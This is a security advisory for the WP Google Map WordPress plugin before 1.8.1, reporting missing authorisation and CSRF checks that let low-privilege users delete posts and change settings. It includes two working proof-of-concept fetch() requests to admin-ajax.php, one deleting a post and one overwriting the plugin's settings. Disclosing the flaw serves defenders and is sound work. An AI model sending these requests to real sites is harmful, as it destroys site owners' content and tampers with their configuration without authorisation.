WP Google Map < 1.8.1 - Subscriber+ Arbitrary Post Deletion and Plugin's Settings Update

2021-12-0800:00:00

Krzysztof Zając

EPSS

0.001

Percentile

21.4%

JSON

The plugin does not have proper authorisation and CSRF in most of its AJAX actions, which could allow any authenticated users, such as subscriber to delete arbitrary posts and update the plugin’s settings. v1.8.1 added authorisation checks, however CSRF was still missing and a separate advisory has been created for that

Removing post:

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=wpgmapembed_remove_wpgmap&post_id=1",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Updating settings:

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=wpgmapembed_save_setup_wizard&wgm_api_key=hohohoho&wgm_language=999&wgm_regional_area=aaaaa",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

References

plugins.trac.wordpress.org/changeset/2641450

EPSS

0.001

Percentile

21.4%

JSON

Related for WPEX-ID:6639DA0D-6D29-46C1-A3CC-5E5626305833